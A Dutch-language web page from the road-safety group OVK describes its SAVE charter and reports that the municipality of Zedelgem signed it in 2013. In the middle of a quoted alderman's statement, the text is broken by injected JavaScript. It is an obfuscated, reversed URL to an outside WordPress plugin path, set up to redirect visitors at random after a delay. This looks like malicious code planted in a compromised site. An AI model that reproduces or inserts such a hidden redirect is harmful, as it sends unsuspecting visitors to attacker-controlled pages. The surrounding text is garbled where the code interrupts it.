Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zedelgem ondertekent het SAVE-charter

Op maandag 28 januari ’13 heeft het gemeentebestuur van Zedelgem het SAVE-charter Steden & Gemeenten ondertekend.

‘We zullen ons actief inzetten voor meer verkeersveiligheid. Sommige ouders verloren een kind in het verkeer. Niemand wil die nachtmerrie meemaken’, zegt Vermeulen. ‘Als schepen zal ik er samen met mobiliteitsambtenaar Christel Casier op toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toezien dat Zedelgem veiliger wordt op het vlak van verkeer. Daarbij reken ik op de steun van het schepencollege en de politiediensten. Het nieuwe verkeerscirculatieplan voor het centrum in Aartrijke is een eerste concrete maatregel.’

De persartikels kunnen hier en hier teruggevonden worden.


© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be